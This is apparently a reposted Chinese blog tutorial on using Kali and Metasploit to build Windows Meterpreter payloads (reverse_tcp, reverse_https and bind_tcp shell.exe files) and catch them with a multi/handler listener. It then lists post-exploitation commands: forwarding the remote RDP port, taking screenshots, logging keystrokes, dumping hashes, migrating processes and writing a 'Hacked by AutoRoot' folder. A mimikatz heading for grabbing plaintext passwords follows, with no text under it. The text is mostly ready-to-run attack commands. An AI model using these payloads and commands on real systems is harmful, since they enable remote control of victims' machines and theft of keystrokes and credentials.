kali生成shell监听目标主机

生成监听用的shell.exe:

reverse_tcp(反向连接)

path : payload/windows/meterpreter/reverse_tcp

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

 

reverse_http/https(反向连接)

path:payload/windows/meterpreter/reverse_http/https

msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

通过http/https的方式反向连接,在网速慢的情况下不稳定,在某博客上看到https如果反弹没有收到数据,可以将监听端口换成443试试。

 

bind_tcp(正向连接)

path : payload/windows/meterpreter/bind_tcp

正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。

 

 

利用shell.exe监听:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.2

msf exploit(handler) > set LPORT 8080

msf exploit(handler) > exploit -j

msf exploit(handler) >sessions

 

基本命令:

常用命令:

background:将当前会话放置后台
load/use:加载模块
Interact:切换进一个信道
migrate:迁移进程
run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。
Resource:执行一个已有的rc脚本。

写入文件夹:
meterpreter > pwd
meterpreter > cd C:\meterpreter > pwd
meterpreter > mkdir Hacked by AutoRoot
meterpreter > ls

 

写入内容:

edit + 文件,调用vi编辑。

 

网络相关:

网络命令则有列出ip信息(ipconfig),展示修改路由表(route),还有端口转发(portfwd)

meterpreter > portfwd
meterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2

在建立规则之后就可以连接本地1314端口,这样远程的3389端口就转发出来了

 

键盘监听:

meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump

注意一下windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。会话0代表控制台,1,2 代表远程桌面。所以要截获键盘输入必须在0中进行。可 以使用getdesktop查看或者截张图试试。否则使用setdesktop切换。

如果不行就切换到explorer.exe进程中,这样也可以监听到远程桌面连接进来之后的键盘输入数据。

 

mimikatz:

抓取明文




 

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。